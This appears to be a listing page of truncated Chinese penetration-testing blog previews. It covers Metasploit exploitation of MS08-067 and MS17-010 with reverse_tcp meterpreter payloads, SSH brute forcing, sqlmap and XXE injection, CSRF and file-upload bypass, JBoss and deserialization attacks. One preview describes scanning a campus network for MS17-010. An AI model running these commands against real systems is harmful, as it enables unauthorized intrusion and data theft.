msf > search ms08_067 Matching Modules ================    Name                                 Disclosure Date  Rank   Description    ----                                 ---------------  ----   -----------    exploit/windows/smb/ms08_067_netapi  20…
 由于新版的kali中没有预装OpenVAS.所以在虚拟机中安装花了非常多的时间. 安装过程参考:http://www.cnblogs.com/zlslch/p/6872559.html过程写的非常详细本文不再赘述.   稍微提示一下:如果使用openvas-check-setup命令检查出有错误但是又不知道如何去修正(恩,没错说的就是我自己^_^!)可以尝试再次使用openvas-setup命令安装一下看看,说不定就好了呢.   安装好后:      启动openvas      修改密码  …
利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口.最近在搞MSF的深入学习,于是有了下文. ms17_010扫描工具 msf中的辅助模块含有一个强大的ms17_010扫描工具: auxiliary/scanner/smb/smb_ms17_010 使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单. 首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16.实际上经过测试,只需扫描10.31.0…
MSF中可以直接使用db_nmap,它是namp的一个封装与NMAP用法完全一致.其执行结果会自动导入至数据库中. 当然也可以在使用 nmap 的 -oX参数输出一个XML格式的文件.这可以是你在本机扫描的结果,也可以是别人分享给你的. 然后在msf中使用db_import命令导入到数据库中. db_import能够识别多种扫描器的结果: Acunetix.Amap.Appscan.Burp Session.Microsoft Baseline Security Analyze.Nessus.N…
渗透测试数据库用来保存渗透测试过程中获取的各种数据,很多时候你重启了kali发现连接不上数据库了,其实就是因为这个服务没开 MSF所使用的数据库时postgresql root@kali:/# service postgresql start     开启postgresql数据库服务 root@kali:/# msfdb init     如果你的msf无法成功连接数据库可以尝试使用初始化命令 A database appears to be already configured, skipp…
密码暴力破解以SSH为例,其他协议方法类似 SSH      msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.3.199 rhosts => 192.168.3.199 msf auxiliary(ssh_login) > set username root username => root msf auxiliary(ssh_login) >…
利用操作系统视频进行社会工程学攻击.例如在探测到目标用户所使用的网络设备.服务器设备厂家型号等信息后.可伪装成相关厂家的技术人员通过电话.邮件等方式与系统管理员取得联系得到信任.NMAP 示例: 使用 -PU -sn 扫描存活主机 使用 -O判断系统 -sV对版本信息进行辨识 -A获取更详细的服务和操作系统信息msf > nmap -PU -sn 192.168.1.0/24[*] exec: nmap -PU -sn 192.168.1.0/24 Starting Nmap 7.40 ( ht…
概要: msf的arp_sweep .udp_sweep模块 Nmap -sn使用ping探测 -PU -sn 使用UDP协议端口探测 msf模块 arp_sweep     常用 ipv6_multicast_ping ipv6_neighbor ipv6_neighbor_router_advertisement udp_probe udp_sweep     常用 同时也会发现主机上的udp服务 msf > use auxiliary/scanner/discovery/arp_sweep…
1.Google hacking 技术 自动化的Google搜索工具 SiteDigger https://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx 2017/07/26无法正常访问 windows程序,由于Googleapi对搜索次数的限制 每次只能执行大概30条查询(未验证)   Search Diggity http://www.stachliu.com 自动跳转至https://www.bishopfox.com/??…
1.1.4渗透测试过程环节 PTES标准7个阶段 1.前期交互阶段      收集客户需求.准备测试计划.定义测试范围与边界.定义业务目标.项目管理与规划等 2.情报搜集阶段      公开来源信息查询.GoogleHacking.社会工程学.网络踩点.扫描探测.被动监听.服务查点等 3.威胁建模阶段      情报搜集完毕后,分析情报.头脑风暴分析可行的攻击通道. 4.漏洞分析阶段      通过前期的信息分析.找出可行的实时渗透攻击的攻击点,在实验环境中验证.高水平团队还会针对攻击通道中的关…
情报搜集环境站渗透测试全过程的80%~90%   一.外围信息搜集(公开渠道信息搜集OSINT  open source intelligence) 3.1.1信息收集-通过DNS和IP地址挖掘目标网络信息 1.whois域名注册信息查询 whois查询时去掉www.ftp等前缀   2.nslookup与dig域名查询 nslookup与dig的区别 nslookup只会得到DNS解析服务器报错在Cache中的非权威解答. dig工具可以从该域名的官方DNS服务器商查询到精确的权威答案.?尝试…
准备: 域名一个,用于增加NS解析,判断是否存在反序列化漏洞. 公网IP服务器一台,用于搭建DNS代理,抓包判断. dnschef,DNS代理 ysoserial.jar生成payload. 简单的python脚本,调用ysoserial.jar并发送payload 首先域名增加一条A记录解析到公网IP服务,然后增加一条NS记录指向这条A记录. 然后公网IP服务器 开防火墙端口53,记得是UDP协议.然后运行dnschef,记得安装dnslib,否则无法正常运行.然后运行记得带参数,不要用默认参…
File Upload File Upload,即文件上传漏洞,一般的上传漏洞可能是未验证上传后缀 或者是验证上传后缀被bypass 或者是上传的文件验证了上传后缀但是文件名不重命名. LOW 直接上传任意文件  MEDIUM 验证Content-Type,修改Content-Type为 image/jpeg直接绕过 HIGH 验证了后缀名.文件大小及限制了上传文件的文件头必须为图像类型. 利用条件: 在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文…
一.背景 笔者此前录制了一套XSS的视频教程,在漏洞案例一节中讲解手工挖掘.工具挖掘.代码审计三部分内容,准备将内容用文章的形式再次写一此,前两篇已经写完,内容有一些关联性,其中手工XSS挖掘篇地址为快速找出网站中可能存在的XSS漏洞实践(一)https://segmentfault.com/a/1190000016095198 本文主要记录通过代码审计的方式进行XSS漏洞挖掘,分为了找出关键位置,正向审计,反向审计三个部分,审计的系统为permeate渗透测试系统,测试系统的搭建可以参考笔者的…
一.背景 笔者6月份在慕课网录制视频教程XSS跨站漏洞 加强Web安全,里面需要讲到很多实战案例,在漏洞挖掘案例中分为了手工挖掘.工具挖掘.代码审计三部分内容,手工挖掘篇参考地址为快速找出网站中可能存在的XSS漏洞实践(一)https://segmentfault.com/a/1190000016095198 本文主要记录利用Web安全工具Burp suite进行XSS漏洞挖掘部分,分为了设置代理,漏洞扫描,漏洞验证三个部分,其中permeate渗透测试系统的搭建可以参考第一篇文章. 二.操作概…
记录下自己写的CSRF漏洞靶场的write up,包括了大部分的CSRF实战场景,做个笔记. 0x01 无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录test用户 发现有个添加成员功能  用test账号添加 发现只有admin才可以添加 现在用另一个浏览器 ,这里用的搜狗浏览器来登录admin账号 我们把test用户添加用户的url地址,这里是添加一个用户名为111和密码为111的用户请求的地址,我们在登录了admin账号的搜狗浏览器新建窗口打开 ht…
记录下自己写的XSS靶场的write up,也是学习了常见xss漏洞类型的实战场景…
环境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe 参考: http://www.freesion.com/article/176849949/  墨者里面的题 都有解 获取登陆地址的请求信息 往请求头信息加入X-Forwarded-For:* 一起写入 保存到本地txt文件 123.txt 执行sqlmap 搜索看有没有漏洞 sqlmap.py -r /Users/lucax/De…
本文由红日安全成员: Once 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助.每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场.JAVA靶场.Python靶场基本上三种靶场全部涵盖)-实战演练(主要选择相应CMS或者是Vulnhub进行实战演练),如果对大…
一.利用shodan,fofa或谷歌搜索关键字:8080/jmx-console/ 二.下载java反序列化终极测试工具进行验证漏洞 三.记住User Current Directory:  C:\jboss-6.1.0.marks\    (ps:这是网站的根目录) 四.war文件的部署 JBoss支持热部署,也就是war文件部署到服务器上后不需要重新启动JBoss(Tomcat不支持这种特性).war文件的部署很简单,直接将war文件拷贝到JBoss\server\default\deplo…
  root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs   available databases [8]: [*] dntg [*] dntg2 [*] dnweb [*] information_schema [*] mysql [*] performance_schema [*] test [*] ultrax     root@kali:~# sqlmap -u http://dn.you.com/shop…
前言 在 2017 年版的 OWASP TOP 10, xxe 强势上位. 本文对网上常见的利用方式做一个汇总 正文 测试环境 win10 phpstudy 测试代码: <?php $data = file_get_contents('php://input'); echo $data; $dom = new DOMDocument(); $dom->loadXML($data); print_r($dom); 就是直接对 POST 数据进行 xml 解析. 读取本地文件(有回显) <?…
X-FORWARDED-FOR 首先,X-Forwarded-For 是一个 HTTP 扩展头部.HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP.如今它已经成为事实上的标准,被各大 HTTP 代理.负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中. XFF 的内容由「英文逗号 + 空格」隔开的多个部分组成,最开始的是离服务端最远的设备…
准备工具 Burp suite Sqlmap 实训目标 1.掌握SQL注入的基本原理:2.了解服务器获取客户端IP的方式:3.了解SQL注入的工具使用: 解题方向 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码. 操作步骤 1.首先打开burp抓包,开启代理,代理开启点击登陆 抓取数据 2.将抓取到的数据发送到Repeater 添加x-forwarded-for:*   将raw的信息存为txt文件,如下图所示 使用Sqlmap 爆出当前的数据库 sqlmap…
中午时候收到了推送的漏洞预警,在网上搜索相关信息看到很多大牛已经开发出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的利用. 0x00 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882).该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本.攻击者可以利用漏洞以当前登录的用户的身份执行任意命令. 由于漏洞影响…
0x00 window 2003 R2 x86 use exploit/windows/smb/ms17_010_eternalblue show options set rhost 192.168.204.133 set lhost 192.168.204.129 set payload windows/meterpreter/reverse_tcp run use exploit/windows/smb/ms17_010_psexec set rhost 192.168.204.133 se…
2018-2019 20165226 Exp6 信息搜集与漏洞扫描 目录 一.实验内容说明及基础问题回答 二.实验过程 Task1 各种搜索技巧的应用 检测特定类型的文件 搜索网址目录结构 tracert Task2 DNS IP注册信息的查询 whois dig nslookup shodan Task3 基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点 主机发现 端口扫描 OS及服务版本探测 具体服务的查点 Task4 漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞…

msf

show exploit show payload msf使用数据库加快搜索,不然每次都等半天 service postgresql startmsfdb reinitmsf > db_rebuild_cache 需要等待几分钟 查询漏洞对应的模块 use exploit/windows/smb/ms08_067_netapi info 查看漏洞信息 show option 查看配置选项 set target 34 设置目标系统 set payload  windows/meterpreter/…
一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067(win7) payload/generic/shell_reverse_tcp(失败) payload/windows/meterpreter/reverse_tcp(失败) ms17_010_eternalblue(win7) payload/windows/x64/meterpreter/reverse_tcp(成功) 攻击浏览器的实践 ms11_050(win7)(成功) ms14_064(win7)   exploit/wi…
一.知识点总结 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六种模块 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去 主动渗透攻击:攻击某个系统服务 被动渗透攻击:攻击某个客户端应用 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提 网络服务的扫描与查点 探查敏感信息泄露.Fuzz测试发掘漏洞 收集登录密码 攻击载荷Payload Module…